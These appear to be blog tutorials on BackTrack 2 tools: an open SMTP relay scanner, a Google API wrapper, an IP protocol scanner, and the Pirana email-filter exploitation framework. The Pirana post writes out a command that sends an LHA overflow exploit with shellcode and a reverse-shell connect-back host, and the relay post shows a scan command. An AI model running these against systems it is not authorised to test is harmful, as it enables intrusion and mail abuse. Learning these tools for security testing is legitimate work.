It can search for SMTP server also locates and identifies open relay SMTP servers. It is an all in one program, you tell it how to scan and it does ALL of the work for you. (Website: http://www.cirt.dk/tools/).

First we have to edit the configuration file host_info.txt and put information of the e-mail server we want to scan. In this example I will use nano to edit the configuration file.

After editing the configuration file we just issue the command which is very simple:

RelayScanner.pl -l host_info.txt

What happened over here is that Relayscanner sent fake internal e-mail to the target and prompted the ping-back response from the reciepient. Only after getting response does Relayscanner continues sending more. That 16416 in total !! under default conditions.

RelayScanner has other options and scopes for using built-in plugins. List of options:

That’s all! Thanks for reading.

pavs
Backtrack 2 Hacking Tools Linux News

A Python wrapper for the Google web API. Allows you to do Google searches, retrieve pages from the Google cache, and ask Google for spelling suggestions.

(Source: http://sourceforge.net/projects/pygoogle/)

Ok there is something you guys should know about Qgoogle. In order for you to use Qgoogle, you need a google SAOP search API key. Unfortunately Google has stopped issuing new API keys. According to their API site (Source). So Unless you already have a key, you are out of luck with Qgoogle.

One more thing to note is that when you try to run Qgoogle in backtrack, they suggest “python googly.py <query>” in order to use it. Well the correct syntex in “qgoogle.py <query>”. But you have to input the API key, assuming you have it. (I don’t have one). If you are using the latest version of Qgoogle (0.6) you can type “qgoogle.py -k <the key here>” or make text file with the key saved in it and call it “googlekey.txt”. With the version Backtrack comes with you have to edit qgoogle.py and edit the line where it says: google.LICENSE_KEY = ” . Just insert license key between the single qoute. Like in this picture:

I used a ajax search API key, which obviously doesn’t work.

That’s it!!

pavsBacktrack 2 Hacking Hacking Tools Linux News

Protos is a IP protocol scanner. It goes through all possible IP protocols and uses a negative scan to sort out unsupported protocols which should be reported by the target using ICMP protocol unreachable messages.

Protos in action.

Thats all!

pavsBacktrack 2 Hacking Tools Linux News

Pirana is an exploitation framework that tests the security of a email content filter. By means of a vulnerability database, the content filter to be tested will be bombarded by various emails containing a malicious payload intended to compromise the computing platform. PIRANA’s goal is to test whether or not any vulnerability exists on the content filtering platform.
(Source: http://www.it-observer.com/tools/34/pirana_smtp_content_exploitation_framework/)

Pirana with all it’s options:

We will try out some of the options in Pirana. First we have to compile the exploits.

Than we will will run this command: pirana.pl -e 1 -h linuxhaxor.net -a pavs@linuxhaxor.net -s 0 -l linuxhaxor.net - 80

Here -e stands for exploit, and of the six available exploits we are using exploit 1, which is “LHA get_header Directory name overflow”

-h stands for host name; -a stands for destination e-mail addie; -s for shellcode types there are 3 types available; finally -l stands for the host to connect back to in reverse shell mode.

We tried the command once with -v, to attach EICAR virus and once without the virus.

And the outcome:

Tada…

There are many combinations of options to play with, but you get an idea of it once you start playing around with it.

That’s all!

pavs
Backtrack 2 Hacking Hacking Tools